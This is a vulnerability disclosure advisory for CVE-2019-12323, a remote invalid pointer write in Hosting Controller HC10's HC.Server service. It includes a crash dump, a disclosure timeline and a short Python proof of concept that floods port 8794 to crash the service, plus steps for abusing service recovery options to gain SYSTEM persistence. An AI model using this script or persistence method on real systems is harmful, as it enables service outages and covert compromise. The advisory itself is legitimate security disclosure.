Share
[+] Credits: John Page (aka hyp3rlinx)   
[+] Website: hyp3rlinx.altervista.org  
[+] Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt  
[+] ISR: ApparitionSec   
  
  
  
[Vendor]  
www.hostingcontroller.com  
  
  
[Product]  
HC10 HC.Server Service 10.14  
  
HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers  
simultaneously as part of a single cluster. HC works on an N-tier user model.  
  
  
[Vulnerability Type]  
Remote Invalid Pointer Write  
  
  
[CVE Reference]  
CVE-2019-12323  
  
  
[Security Issue]  
The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794.  
In addition this can potentially be leveraged for post exploit persistence with SYSTEM privileges, if physical access or malware is involved.  
  
If a physical attacker or malware can set its own program for the service failure recovery options, it can be used to maintain persistence.  
Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn can start the attackers recovery program.  
The attackers program can then try restarting the affected service to try an stay unnoticed by calling "sc start HCServerService".  
  
Services failure flag recovery options for "enabling actions for stops or errors" and can be set in the services "Recovery" properties tab  
or on the command line. Authentication is not required to reach the vulnerable service, this was tested successfully on Windows 7/10.  
  
  
SERVICE_NAME: HCServerService  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 0 IGNORE  
BINARY_PATH_NAME : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe"  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : HC Server Service  
DEPENDENCIES : HCProvisioningService  
SERVICE_START_NAME : LocalSystem  
  
  
Crash Dump:  
  
INVALID_POINTER_WRITE_EXPLOITABLE  
  
CONTEXT: (.ecxr)  
rax=0000000000000bfd rbx=0000000000df94f0 rcx=03743db166a90000  
rdx=0000000080000000 rsi=00000000000000b4 rdi=0000000000000000  
rip=0000000140025b6c rsp=000000000118f570 rbp=0000000000000000  
r8=000000000000001f r9=00000000000006fe r10=0000000000000603  
r11=0000000000df0158 r12=0000000000000000 r13=0000000000000000  
r14=0000000000000000 r15=0000000000000000  
iopl=0 nv up ei pl nz na pe nc  
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
HC_Server+0x25b6c:  
00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 ss:00000000`0119033d=??  
Resetting default scope  
  
FAULTING_IP:   
HC_Server+25b6c  
00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0  
  
EXCEPTION_RECORD: (.exr -1)  
ExceptionAddress: 0000000140025b6c (HC_Server+0x0000000000025b6c)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 0000000000000001  
Parameter[1]: 000000000119033d  
Attempt to write to address 000000000119033d  
  
PROCESS_NAME: HC.Server.exe  
  
  
  
[Exploit/POC]  
1) Configure the HCServiceService recovery failure options to an arbitrary program.  
2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges.  
  
from socket import *  
  
IP = raw_input("[+] HC Server Service IP ")  
PORT = 8794  
  
payload = "A"*4000  
s=socket(AF_INET,SOCK_STREAM)  
s.connect((IP, PORT))  
s.send(payload)  
s.close()  
  
print "Triggering HC10 Server Service Xploit"  
print "hyp3rlinx"  
  
  
  
[Network Access]  
Remote  
  
  
  
[Severity]  
Medium  
  
  
  
[Disclosure Timeline]  
Vendor Notification: May 14, 2019  
No reply  
Second notification: May 21, 2019  
Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019   
mitre assign CVE: May 27, 2019  
Vendor : "New installer to be released June 13, 2019"  
June 16, 2019 : Public Disclosure  
  
  
  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).  
  
hyp3rlinx